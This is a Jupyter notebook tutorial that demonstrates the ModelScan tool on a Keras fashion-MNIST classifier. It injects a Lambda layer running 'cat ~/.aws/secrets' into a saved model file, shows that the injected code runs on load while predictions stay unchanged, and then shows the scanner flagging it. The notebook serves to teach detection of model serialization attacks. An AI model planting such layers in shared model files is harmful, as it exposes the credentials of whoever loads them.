# Running ModelScan on a Keras Model

## Import statements

In [ ]:
import tensorflow as tf
import os
tf.compat.v1.logging.set_verbosity(tf.compat.v1.logging.ERROR)
from utils.tensorflow_fashion_mnist_model import train_model, get_predictions

## Download and save the model

We are going to use a Keras model which is for classification of fashion/clothing items and trained on fashion mnist dataset (https://www.tensorflow.org/tutorials/keras/classification). The safe model is saved at `KerasModels/safe_model` 

In [ ]:
model_directory = "KerasModels"
if not os.path.isdir(model_directory):
    os.mkdir(model_directory)

safe_model_path = os.path.join(model_directory, "safe_model.h5")
model = train_model()
model.save(safe_model_path,)

## Run the model

Run the safe model to verify that it has been downloaded correctly.

In [ ]:
number_of_predictions = 3
get_predictions(model, number_of_predictions)

## Run ModelScan on the safe model

Now run the Modelscan tool using the modelscan command. Remember that we installed modelscan in our virtualenv. 

**The scan results include information on the files scanned, and any issues if found. For the safe model scanned, modelscan finds no model serialization attacks.**

In [ ]:
!modelscan -p ./KerasModels/safe_model.h5

## Model Serialization Attack

Here malicious code is injected in the safe model to read aws secret keys using Keras' lambda layer. The unsafe model is saved at `./KerasModels/unsafe_model.h5`

In [ ]:
safe_model_loaded = tf.keras.models.load_model(safe_model_path)

attack = (    
    lambda x: os.system(
        """cat ~/.aws/secrets"""
    )
    or x
)

lambda_layer = tf.keras.layers.Lambda(attack)(safe_model_loaded.outputs[-1])
unsafe_model = tf.keras.Model(inputs=safe_model_loaded.inputs, outputs=lambda_layer)

## Save the Model

In [ ]:
unsafe_model_path = os.path.join(model_directory, "unsafe_model.h5")
unsafe_model.save(unsafe_model_path)

## Unsafe Model Prediction

The malicious code injected in the unsafe model gets executed when it is loaded. The aws secret keys are displayed.

Also, the unsafe model predicts the clothing items just as well as safe model i.e., the code injection attack will not impact the model performance. The unaffected performance of unsafe models makes the ML models an effective attack vector.

In [ ]:
unsafe_model_loaded = tf.keras.models.load_model(unsafe_model_path)

number_of_predictions = 3
get_predictions(unsafe_model_loaded, number_of_predictions)

## Run ModelScan on the unsafe model

The scan results include information on the files scanned, and any issues if found. In this case, a critical severity level issue is found in the unsafe model scanned.

modelscan also outlines the found operator(s) and module(s) deemed unsafe.

In [ ]:
!modelscan -p KerasModels/unsafe_model.h5

## Change the reporting format of output

This will save the scan results in file: keras-model-scan-results.json

In [ ]:
!modelscan --path  KerasModels/unsafe_model.h5 -r json -o keras-model-scan-results.json